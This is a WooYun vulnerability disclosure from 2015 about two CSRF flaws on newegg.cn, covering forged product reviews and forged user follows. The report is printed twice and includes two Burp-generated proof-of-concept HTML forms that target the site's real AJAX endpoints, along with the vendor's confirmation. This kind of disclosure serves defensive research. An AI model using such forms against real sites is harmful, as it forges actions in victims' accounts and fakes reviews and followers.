当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135909

漏洞标题:新蛋网两次csrf,关注/用户评论

相关厂商:newegg(新蛋网)

漏洞作者: Xenc

提交时间:2015-08-21 18:18

修复时间:2015-10-10 11:18

公开时间:2015-10-10 11:18

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

新蛋中国,领先的网上购物商城-手机 电脑 数码 家电 服装 化妆品 家居 食品等,正品低价,货到付款。 - 新蛋中国
我相信那么好的网站,一定有那么好的厂商......

详细说明:

我们在卖家发布的产品处用户评论的地方 and 关注蛋友的csrf
具体如下:
首先评论and关注的数据包中一定带有用户的ID
那么ID就在源码中,如下图:

1.png


图中的 "323320" 这个就产品的ID然后我们点进去用户评论的

2.png


在此处评论,我们用Burp截包

3.png


11是我们评论的内容, 323320是产品的ID 刚刚也看了 我已经圈出来了
我们在用burp生成csrf的界面

4.png


代码如下:

<html>
<!-- CSRF PoC - generated by burp suite professional -->
<body>
<form action="http://www.newegg.cn/Ajax/FeedBack/AjaxPostReview.aspx" method="POST">
<input type="hidden" name="images" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="score" value="" />
<input type="hidden" name="content" value="11" />
<input type="hidden" name="referencesysno" value="323320" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="rmasysno" value="&#45;1" />
<input type="hidden" name="linktype" value="&#45;1" />
<input type="hidden" name="linksysno" value="&#45;1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


我们保存在csrf.html当中。
我们先看看我评论的次数

5.png


评论了6次
然后我们在打开csrf.html 单击按钮出现以下代码

6.png


我们再去刷新下网址看看

8.png


从而发现是评论的
我们在会去看看我们的评论处有没有增加

7.png


多了一篇说明我们是成功了(当然成功不成功我提交干嘛 0.0)
以上的是用户评论处的csrf,以下是关注蛋友的csrf
首先去找到一个用户,算了 我再去弄个小号测试
我们首先在关注人的哪里去抓包

9.png


圈出来的是用户的id,然后我们在去替换成我的账号,我们在来测试
我的id是"389270" 我们修改下代码就可以了
代码如下:

<html>
<!-- CSRF PoC - generated by burp suite professional -->
<body>
<form action="http://space.newegg.cn/Ajax/Feedback/AjaxUpdateCustomerFollow.aspx" method="POST">
<input type="hidden" name="customerSysNo" value="35747502" />
<input type="hidden" name="type" value="add" />
<input type="hidden" name="pageType" value="1" />
<input type="hidden" name="itemIndex" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


我们在用别人账号去测试这个csrf,将设置成csrf1.html
我们看看我关注的蛋友

10.png


这两个人是在我刚刚测试的时候关注的 我们修改下用户的id即可
打开csrf1.html 单击按钮得到以下代码

11.png


图中圈出来的说明我们已经关注了
我们去看看我们关注的蛋友里看看有没有存在这个用户
好吧 我承认我错了,id不是这个 是"35747502" 这个是我们的id ,id可以在最近访客的关注哪里的javascript代码找到那里面找到

13.png


这个用户也是我的,我们用120***7688 这个账号去关注testwooyun这个账号
testwooyun这个账号id是:35747502
我们在看看关注的蛋友的

14.png


没有testwooyun的用户被我关注 那么我们就用csrf1.html来测试csrf关注
我们再修改下id 然后在测试csrf1.html
按下按钮我们在 看到了代码

15.png


成功被关注 我们看看我们关注的蛋友里面有没有testwooyun这个用户

16.png


成功了此处证明了关注蛋友的存在csrf , 利用这个的话我们可以刷粉丝.....
利用评论的我们可以刷评论....
求rank,求礼物,听说给礼物才能让自己的网站更安全

漏洞证明:

我们在卖家发布的产品处用户评论的地方 and 关注蛋友的csrf
具体如下:
首先评论and关注的数据包中一定带有用户的ID
那么ID就在源码中,如下图:

1.png


图中的 "323320" 这个就产品的ID然后我们点进去用户评论的

2.png


在此处评论,我们用Burp截包

3.png


11是我们评论的内容, 323320是产品的ID 刚刚也看了 我已经圈出来了
我们在用burp生成csrf的界面

4.png


代码如下:

<html>
<!-- CSRF PoC - generated by burp suite professional -->
<body>
<form action="http://www.newegg.cn/Ajax/FeedBack/AjaxPostReview.aspx" method="POST">
<input type="hidden" name="images" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="score" value="" />
<input type="hidden" name="content" value="11" />
<input type="hidden" name="referencesysno" value="323320" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="rmasysno" value="&#45;1" />
<input type="hidden" name="linktype" value="&#45;1" />
<input type="hidden" name="linksysno" value="&#45;1" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


我们保存在csrf.html当中。
我们先看看我评论的次数

5.png


评论了6次
然后我们在打开csrf.html 单击按钮出现以下代码

6.png


我们再去刷新下网址看看

8.png


从而发现是评论的
我们在会去看看我们的评论处有没有增加

7.png


多了一篇说明我们是成功了(当然成功不成功我提交干嘛 0.0)
以上的是用户评论处的csrf,以下是关注蛋友的csrf
首先去找到一个用户,算了 我再去弄个小号测试
我们首先在关注人的哪里去抓包

9.png


圈出来的是用户的id,然后我们在去替换成我的账号,我们在来测试
我的id是"389270" 我们修改下代码就可以了
代码如下:

<html>
<!-- CSRF PoC - generated by burp suite professional -->
<body>
<form action="http://space.newegg.cn/Ajax/Feedback/AjaxUpdateCustomerFollow.aspx" method="POST">
<input type="hidden" name="customerSysNo" value="35747502" />
<input type="hidden" name="type" value="add" />
<input type="hidden" name="pageType" value="1" />
<input type="hidden" name="itemIndex" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


我们在用别人账号去测试这个csrf,将设置成csrf1.html
我们看看我关注的蛋友

10.png


这两个人是在我刚刚测试的时候关注的 我们修改下用户的id即可
打开csrf1.html 单击按钮得到以下代码

11.png


图中圈出来的说明我们已经关注了
我们去看看我们关注的蛋友里看看有没有存在这个用户
好吧 我承认我错了,id不是这个 是"35747502" 这个是我们的id ,id可以在最近访客的关注哪里的javascript代码找到那里面找到

13.png


这个用户也是我的,我们用120***7688 这个账号去关注testwooyun这个账号
testwooyun这个账号id是:35747502
我们在看看关注的蛋友的

14.png


没有testwooyun的用户被我关注 那么我们就用csrf1.html来测试csrf关注
我们再修改下id 然后在测试csrf1.html
按下按钮我们在 看到了代码

15.png


成功被关注 我们看看我们关注的蛋友里面有没有testwooyun这个用户

16.png


成功了此处证明了关注蛋友的存在csrf , 利用这个的话我们可以刷粉丝.....
利用评论的我们可以刷评论....
求rank,求礼物,听说给礼物才能让自己的网站更安全

修复方案:

-_-!

版权声明:转载请注明来源 Xenc@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-26 11:16

厂商回复:

非常感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-22 10:50 | Xenc ( 实习白帽子 | Rank:43 漏洞数:11 | 个人博客:www.hackang.com)

    @疯狗 求审核http://www.wooyun.org/bugs/wooyun-2015-0136033/trace/28fff67ee97559a67f79c397c134c33b

  2. 2015-08-22 18:25 | 乳酸君、 ( 路人 | Rank:8 漏洞数:2 | 看,漏洞)

    骚年高产啊